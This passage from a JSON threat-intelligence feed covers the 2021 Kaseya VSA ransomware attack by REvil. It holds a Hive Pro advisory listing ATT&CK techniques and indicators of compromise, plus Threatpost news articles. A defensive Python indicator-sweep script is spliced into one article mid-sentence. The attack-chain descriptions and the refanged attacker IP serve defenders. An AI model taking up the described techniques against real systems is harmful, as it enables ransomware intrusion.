"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30116", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202124.pdf>).\n\nThe REvil ransomware group was successful in carrying out a supply chain attack by exploiting the zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server and delivering a malicious script to all the computer devices managed by servers. 
The script delivered the REvil ransomware and encrypted the files of the clients managed by the server, affecting almost 1 million computer devices.\n\nHive Pro researchers have identified three more zero-day vulnerabilities that were possibly used to target the clients:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability\n\n**The techniques used by the REvil ransomware include:**\n\n * TA0001: Initial Access\n * T1189: Drive-by Compromise\n * T1566: Phishing\n * T1566.001: Spearphishing Attachment\n * TA0002: Execution\n * T1059: Command and Scripting Interpreter\n * T1106: Native API\n * T1059.001: PowerShell\n * T1059.005: Visual Basic\n * T1059.003: Windows Command Shell\n * TA0003: Persistence\n * T1204: User Execution\n * T1047: Windows Management Instrumentation\n * T1204.002: Malicious File\n * TA0004: Privilege Escalation\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1574: Hijack Execution Flow\n * T1574.002: DLL Side-Loading\n * TA0005: Defense Evasion\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1140: Deobfuscate/Decode Files or Information\n * T1055: Process Injection\n * TA0006: Credential Access\n * T1562: Impair Defenses\n * T1562.001: Disable or Modify Tools\n * T1070: Indicator Removal on Host\n * T1070.004: File Deletion\n * T1036: Masquerading\n * T1036.005: Match Legitimate Name or Location\n * T1112: Modify Registry\n * T1027: Obfuscated Files or Information\n * T1055: Process Injection\n * TA0007: Discovery\n * T1083: File and Directory Discovery\n * TA0008: Lateral Movement\n * T1069: Permission Groups Discovery\n * T1069.002: Domain Groups\n * T1012: Query Registry\n * T1082: System Information Discovery\n * TA0011: Command and Control\n * T1071: Application Layer Protocol\n * T1071.001: 
Web Protocols \n * T1573: Encrypted Channel \n * T1573.002: Asymmetric Cryptography\n * T1105: Ingress Tool Transfer\n * TA0010: Exfiltration\n * T1041: Exfiltration Over C2 Channel\n * TA0040: Impact\n * T1485: Data Destruction\n * T1486: Data Encrypted for Impact\n * T1490: Inhibit System Recovery \n * T1489: Service Stop\n\n#### Threat Actor\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise\n\n**Type**| **Value** \n---|--- \nIPv4| 161[.]35.239.148 \nHash(SHA256)| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C \n \n#### References\n\n<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>\n\n<https://otx.alienvault.com/pulse/60e40b4535299fb6755143cf>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n\n<https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n\n<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>\n\n<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T12:32:57", "type": "hivepro", "title": "REvil Ransomware gang behind the Kaseya VSA Supply-Chain attack", "bulletinFamily": "info", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T12:32:57", "id": "HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3", "href": "https://www.hivepro.com/revil-ransomware-gang-behind-the-kaseya-vsa-supply-chain-attack/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-07-07T18:25:01", "description": "UPDATE 2\n\nThe worldwide July 2 attacks on the Kaseya Virtual System/Server Administrator (VSA) platform by the REvil ransomware gang turn out to be the result of exploits for at least one zero-day security vulnerability, and the company is swinging into full mitigation mode, with patches for the on-premise version coming sometime this week, it said.\n\nThe VSA software is used by Kaseya customers to remotely monitor and manage software and network infrastructure. 
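Looking back at the indicator table in the Hive Pro advisory above: the IPv4 address is defanged with `[.]`, one hash is upper-case, and all four hashes are 64 hex digits, which is a SHA-256 length, whatever the feed's label says. An indicator sweep has to normalize those details before matching, or it silently misses hits. The following is an added example (not from Hive Pro, Threatpost or Kaseya) that takes the advisory's indicators as printed, derives the hash type from the digest length, and runs them over a few constructed log lines; the proxy and EDR lines, hostnames and paths are made up for the example.

```python
import re

# Indicators exactly as printed in the Hive Pro advisory above: one defanged
# IPv4 address and four file hashes. The label 'Hash' is deliberately generic;
# the type is derived from the value below.
RAW_IOCS = [
    ('IPv4', '161[.]35.239.148'),
    ('Hash', 'd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e'),
    ('Hash', '8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd'),
    ('Hash', 'e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2'),
    ('Hash', '45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C'),
]

# Constructed sample telemetry (not real logs): a proxy line to the listed
# address, an EDR file event carrying one listed hash in lower case, an
# unrelated EDR line, and a proxy line to a different address sharing a prefix.
SAMPLE_LOGS = [
    '2021-07-02T18:41:07Z proxy01 CONNECT src=10.20.1.14 dst=161.35.239.148:443 action=allow',
    '2021-07-02T18:44:52Z edr host=WS-0417 event=file_create path=C:/ProgramData/staging/payload.bin '
    'sha256=45aebd60e3c4ed8d3285907f5bf6c71b3b60a9bcb7c34e246c20410cf678fc0c',
    '2021-07-02T18:45:01Z edr host=WS-0417 event=process_start image=C:/Windows/System32/certutil.exe',
    '2021-07-02T19:02:13Z proxy01 CONNECT src=10.20.1.22 dst=161.35.239.14:443 action=allow',
]

HASH_TYPES = {32: 'md5', 40: 'sha1', 64: 'sha256'}


def refang(value):
    '''Undo the usual defanging so the indicator matches what logs contain.'''
    return value.replace('[.]', '.').replace('(.)', '.').replace('hxxp', 'http')


def classify_hash(value):
    '''Return md5/sha1/sha256 from the digest length, or None if not a hex digest.'''
    if re.fullmatch('[0-9a-fA-F]+', value) is None:
        return None
    return HASH_TYPES.get(len(value))


def normalize_iocs(raw):
    '''Refang addresses, lower-case hashes, and replace the feed's type label
    with one derived from the value, so a mislabelled hash is still matched.'''
    out = []
    for ioc_type, value in raw:
        value = refang(value.strip())
        if ioc_type.lower().startswith('hash'):
            out.append((classify_hash(value) or 'hash', value.lower()))
        else:
            out.append((ioc_type.lower(), value))
    return out


def _pattern(ioc_type, value):
    # Anchor on non-token characters: an indicator such as 161.35.239.14 must
    # not fire on 161.35.239.148, and a digest must not match inside a longer hex run.
    if ioc_type == 'ipv4':
        return '(?<![0-9.])' + re.escape(value) + '(?![0-9.])'
    return '(?<![0-9a-fA-F])' + value + '(?![0-9a-fA-F])'


def sweep(lines, iocs):
    '''Match every indicator against every line; return hits with the line index.'''
    compiled = [(t, v, re.compile(_pattern(t, v), re.IGNORECASE)) for t, v in iocs]
    hits = []
    for i, line in enumerate(lines):
        for ioc_type, value, rx in compiled:
            if rx.search(line):
                hits.append({'line': i, 'type': ioc_type, 'value': value})
    return hits


if __name__ == '__main__':
    for hit in sweep(SAMPLE_LOGS, normalize_iocs(RAW_IOCS)):
        print(hit['type'], hit['value'], '->', SAMPLE_LOGS[hit['line']])
```

The same sweep works over any line-oriented export (proxy, DNS, EDR file events); the point of deriving the hash type from its length is that a feed label such as "SHA1" on a 64-digit digest would otherwise send you querying the wrong field in your EDR.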
It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nThe attacks on the VSA (details on the multiple zero-day bugs believed used are below) are now estimated to have led to the encryption of files for around 60 Kaseya customers using the on-premises version of the platform \u2013 many of which are managed service providers (MSPs) who use VSA to manage the networks of other businesses.\n\nThat MSP connection allowed REvil access to those customers-of-customers, and there are around 1,500 downstream businesses now affected, Kaseya said in an [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>). It\u2019s estimated that more than a million individual systems are locked up, and Kaspersky [on Monday said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) that it had seen more than 5,000 attack attempts in 22 countries at that point.\n\n\u201cThe VSA server is used to manage large fleets of computers, and is normally used by MSPs to manage all their clients,\u201d explained researchers at Truesec, [in a post](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) on Sunday. \u201cWithout separation between client environments, this creates a dependency: If the VSA server is compromised, all client environments managed from this server can be compromised too.\u201d\n\nIt added, \u201cAdditionally, if the VSA server is exposed to internet, any potential vulnerability could be leveraged over the internet to breach the server. This is what happened in this case. The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. 
The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.\u201d\n\nThus, while customers wait for patches, \u201cAll on-premises VSA servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations,\u201d Kaseya said. \u201cA patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture.\u201d\n\nMeanwhile, \u201cwe have been advised by our outside experts, that customers who experienced ransomware and receive communication from the attackers should not click on any links \u2013 they may be weaponized,\u201d the firm added.\n\nThe company has also released a new version of a [compromise detection tool](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>) for companies to analyze a system (either VSA server or managed endpoint) and determine whether any indicators of compromise (IoC), data encryption or the REvil ransom note are present.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the FBI also offered joint [protection advice](<https://threatpost.com/kaseya-attack-fallout/167541/>) over the weekend for those not yet affected by the attacks.\n\nKaseya also took the software-as-a-service (SaaS) platform offline, significantly reducing the number of customers exposed to the internet and therefore to attacks. It was scheduled to be back online Tuesday (the kickoff will be a staged comeback that will see functionality turned back on in waves), but Kaseya said that it ran into a problem with the update. 
It now plans to start restoring SaaS services no later than the evening of Thursday, July 8.\n\nAs for the on-prem patch, the company will be publishing a runbook Wednesday of the changes customers must make to their environment to prepare for the patch release, which is now expected by Friday.\n\n### Planned Enhanced Security Measures\n\nAccording to Kaseya, the enhanced security measures that will be brought online with the SaaS update are:\n\n * 24/7 independent SOC for every VSA with the ability to quarantine and isolate files and entire VSA servers.\n * A complementary CDN with WAF for every VSA (including for on-premise users that opt-in and wish to use it)\n * Customers who whitelist IPs will be required to whitelist additional IPs.\n\nThis \u201cgreatly reduces the attack surface of Kaseya VSA overall,\u201d the company said.\n\n## **REvil Lowers Ransom for Universal Decryptor**\n\nREvil is offering a universal public decryption key that will remediate all impacted victims, it said. While the initial ransom price was $70 million, the gang has lowered its asking price to $50 million [according to one researcher](<https://twitter.com/jackhcable/status/1411906687968161792>).\n\nAbsent a universal decryptor, some impacted companies are turning to individual negotiations with REvil, according [to reports](<https://www.databreaches.net/some-kaseya-victims-privately-negotiating-with-revil/>). For instance, researcher Marco A. 
De Felice [described (in Italian)](<https://www.suspectfile.com/kaseya-data-breach-70m-per-il-decrittatore-universale-intanto-revil-tratta-privatamente-con-alcune-vittime/>) a set of observed chat logs, with various individual company ransoms being listed at $550,000 (and then lowered to $225,000), and in another case the ransom was less than $50,000.\n\nUnfortunately, for those already infected by the REvil ransomware, the ability to remediate an attack will come down to case-by-case security postures, such as having offline backups of files in place.\n\n\u201cREvil uses the Salsa20 symmetric stream algorithm for encrypting the content of files and the keys for it with an elliptic curve asymmetric algorithm,\u201d according to Kaspersky researchers. \u201cDecryption of files affected by this malware is impossible without the cybercriminals\u2019 keys due to the secure cryptographic scheme and implementation used in the malware.\u201d\n\n## **Zero Days, Not SolarWinds Part 2**\n\nThe attack itself appears to be more akin to the [Accellion attacks](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) that cropped up all spring rather than the devastating [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) earlier this year.\n\nThe former had to do with zero-day vulnerabilities that were present in the Accellion legacy File Transfer Appliance product. Bad actors with connections to the FIN11 and the Clop ransomware gang hit multiple Accellion FTA customers in the financially motivated attacks, including the Jones Day Law Firm, Kroger and Singtel. All received extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website.\n\nSolarWinds meanwhile was an attack that the U.S. 
attributed to the Russian government, which involved tampering with SolarWinds\u2019 back-end systems in order to push a boobytrapped software update to unsuspecting customers containing a backdoor. Follow-on espionage attacks then were attempted targeting tech firms and several U.S. government agencies.\n\nIn the Kaseya case, adversaries are exploiting at least one zero-day security vulnerability, to push ransomware to Kaseya\u2019s customers.\n\n\u201cThe attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\u201d the company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in its technical incident analysis. \u201cThis allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya\u2019s VSA codebase has been maliciously modified.\u201d\n\nKaseya knew about one bug (CVE-2021-30116) before the attacks started \u2013 it had been reported to the company by the Dutch Institute for Vulnerability Disclosure (DIVD).\n\n\u201cDuring the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched,\u201d according to [a DIVD advisory](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>). \u201cThey showed a genuine commitment to do the right thing. 
Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch.\u201d\n\nSeparately, researchers at Huntress Labs identified a zero-day used in the attack, though it\u2019s unclear if it\u2019s separate from CVE-2021-30116: \u201cHuntress has confirmed that cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers,\u201d [it said](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>).\n\nTruSec meanwhile noted that \u201c[while] not all details have been confirmed yet, but we can say with high confidence that the exploit involved multiple flaws: Authentication bypass; arbitrary file upload; code injection.\u201d\n\nAccording to Kaspersky, the exploit involves the attackers deploying a malicious dropper via a PowerShell script. That script disables Microsoft Defender features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library is then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique, according to the firm.\n\nOther technical details on the bug and attack chain are scant, for now.\n\nKaseya is due to post another update Tuesday morning, and Threatpost will update this post accordingly.\n\n**Update 2: This post was updated at 2:15 p.m. ET on July 7 to reflect a revised patch timeline and expected debut of a runbook for preparing for the patch.**\n\n**Update 1: This post was updated at 10:30 a.m. 
ET on July 7 to include a revised patch timeline and planned enhanced security measures.**\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-06T15:42:42", "type": "threatpost", "title": "Kaseya Patches Imminent After Zero-Day Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-06T15:42:42", "id": "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "href": "https://threatpost.com/kaseya-patches-zero-day-exploits/167548/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-06T21:35:58", "description": "UPDATE\n\nCybercriminals behind a string of high-profile ransomware attacks, including [one extorting $11 million from JBS Foods](<https://threatpost.com/jbs-paid-11m/166767/>) last month, have ported their malware code to the Linux operating system. 
The unusual move is an attempt to target VMware\u2019s ESXi virtual machine management software and network attached storage (NAS) devices that run on the Linux operating system (OS).\n\nResearchers at AT&T Cybersecurity said they have confirmed four Linux samples of the REvil malware in the wild.\n\nOfer Caspi, security researcher at Alien Labs, a division of AT&T Cybersecurity, wrote [in a Thursday blog](<https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version>) that after receiving a tip from [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1409577829289934851?s=20>) it identified the four samples.\n\n\u201cREvil ransomware authors have expanded their arsenal to include Linux ransomware, which allows them to target ESXi and NAS devices,\u201d Caspi wrote.\n\nIn a nod to research by [AdvIntel](<https://twitter.com/y_advintel/status/1391450354051653633>) in early May 2021, which reported REvil\u2019s intent to port its Windows-based ransomware to Linux, Caspi confirmed the Linux variant was spotted in May \u201caffecting *nix systems and ESXi.\u201d\n\n\u201cThe samples are ELF-64 executables, with similarities to the Windows REvil executable, being the most noticeable among the configuration options,\u201d he wrote.\n\nExecutable and Linkable Format (or ELF-64) is a standard file format for executable files within Linux and UNIX-like operating systems, [according to a technical breakdown](<https://0xax.gitbooks.io/linux-insides/content/Theory/linux-theory-2.html>).\n\n## **Linux Ransomware: Rare, but Real**\n\nWhat makes Alien Labs\u2019 discovery of the Linux REvil variant unique is that Linux, Unix and other Unix-like operating systems are not typically targeted by adversaries. Microsoft Windows computer systems generally deliver the biggest return for an attacker\u2019s effort because of the ubiquity of the OS. 
Furthermore, instances of Linux are generally well-protected against vulnerabilities, thanks to a tightknit user-base delivering fast security updates.\n\nPast examples of Linux malware over the past several years have included Tycoon, Lilocked (or Lilu) and [QNAPCrypt](<https://threatpost.com/qnap-flaws-plague-nas-systems/161924/>). In November, Kaspersky identified a Linux sample of RansomEXX. Researchers noted that criminals based its Linux variant on \u201cWinAPI (functions specific to Windows OS)\u201d and used a similar mechanism to manipulate targeted Linux MBED TLS libraries.\n\nMBED TLS is an implementation of the TLS and SSL protocols distributed under the Apache License.\n\n\u201cThe Apache license itself has nothing to do with web servers, other than it being one of the more widely used pieces of software that uses the license, among hundreds of thousands of other open source projects,\u201d said Kenneth White, director of the Open Crypto Audit Project.\n\nIn May, researchers noted criminals behind the [DarkSide ransomware also released a Linux variant](<https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html>). Attackers also targeted, \u201cvirtual machine-related files on VMware ESXI servers.\u201d Researchers said the malware \u201cparses its embedded configuration, kills virtual machines, encrypts files on the infected machine, collects system information, and sends it to the remote server.\u201d\n\n## **Targeted Attacks: Linux in the Crosshairs **\n\nVMware ESXi, formerly known as ESX, is a bare metal hypervisor that installs easily on to your server and partitions it into multiple virtual machines (VM).\n\n\u201cThe hypervisor ESXi allows multiple virtual machines to share the same hard drive storage. However, this also enables attackers to encrypt the centralized virtual hard drives used to store data from across VMs, potentially causing disruptions to companies,\u201d Alien Labs reported. 
\u201c[I]n addition to targeting ESXi, REvil is also targeting NAS devices as another storage platform with the potential to highly impact the affected companies.\u201d\n\nResearchers said the Linux version of REvil shares similar attributes with the Windows OS variant. \u201cThe [executable\u2019s] configuration file format is very similar to the one observed for REvil Windows samples, but with fewer fields,\u201d Caspi wrote.\n\nSimilarities also include:\n\n * Base64-encoded value containing the attacker\u2019s public key used to encrypt files.\n * Ransomware-as-a-service (RaaS) affiliate identifier (7987) is shared between both operating systems.\n * The ransom note\u2019s body content is encoded in base64.\n * The encrypted file extensions, which on both platforms appear to be five random characters: .rhkrc, .qoxaq, .naixq and .7rspj.\n\n\u201cThe threat actors behind REvil RaaS have rapidly developed a Linux version to compete against the recently released Linux version of DarkSide. It is hard to clarify if these two RaaS are competing against each other or collaborating team members, as stated by other security researchers,\u201d researchers wrote.\n\n_**(This article was updated 7/6 at 12:40 p.m. 
ET to reflect a clarification on the nature of the Apache software license in the context of MBED TLS.)**_\n", "cvss3": {}, "published": "2021-07-01T20:56:15", "type": "threatpost", "title": "Linux Variant of REvil Ransomware Targets VMware\u2019s ESXi, NAS Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-01T20:56:15", "id": "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "href": "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity and Infrastructure Security Agency (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. 
CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after, it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called 
\u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\u201d\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n\u201cWe are still investigating whether all versions are exploitable,\u201d the company wrote. 
\u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": 
"THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-13T12:49:34", "description": "Kaseya made good on its promise to issue patches by July 11.\n\nOn Saturday, the company behind the Virtual System/Server Administrator (VSA) platform that got walloped by the REvil ransomware-as-a-service (RaaS) gang in a massive supply-chain attack released urgent updates to address critical zero-day security vulnerabilities in VSA.\n\nKaseya [released the VSA 9.5.7a (9.5.7.2994) update](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) to fix three zero-day vulnerabilities used in the ransomware attacks.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe company said on its [rolling advisory page](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) that all of its software-as-a-service (SaaS) customers were back up as of this morning, while the company was still working to restore on-premises customers that needed help:\n\n> The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. \u2014Kaseya\n\n## A Brazen Ransomware Blitz\n\nOn July 2, the [REvil gang wrenched open](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) those three VSA zero-days in [more than 5,000 attacks](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>). As of July 5, the worldwide assault had been unleashed in 22 countries, reaching not only Kaseya\u2019s managed service provider (MSP) customer base but also, given that many of them use VSA to manage the networks of other businesses, clawing at those MSP\u2019s customers.\n\nKaseya customers use VSA to remotely monitor and manage software and network infrastructure. 
It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nFollowing the brazen ransomware attacks, CISA and FBI last week [offered guidance](<https://threatpost.com/kaseya-attack-fallout/167541/>) to victims. Threat actors were quick to exploit the situation, having planted Cobalt Strike backdoors by malspamming a [bogus Microsoft update](<https://threatpost.com/fake-kaseya-vsa-update-cobalt-strike/167587/>) along with a malicious \u201cSecurityUpdates\u201d executable.\n\nAs of July 6, Kaseya said in its [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>) that there were fewer than 60 customers affected but far more \u2013 \u201cfewer than 1,500,\u201d it said \u2013 downstream businesses that got hit.\n\n## Kaseya Dismissed Workers\u2019 Cybersec Warnings\n\nKaseya already knew about these bugs when the attacks were launched. In April, the Dutch Institute for Vulnerability Disclosure (DIVD) had disclosed seven vulnerabilities to Kaseya.\n\nOn Saturday, 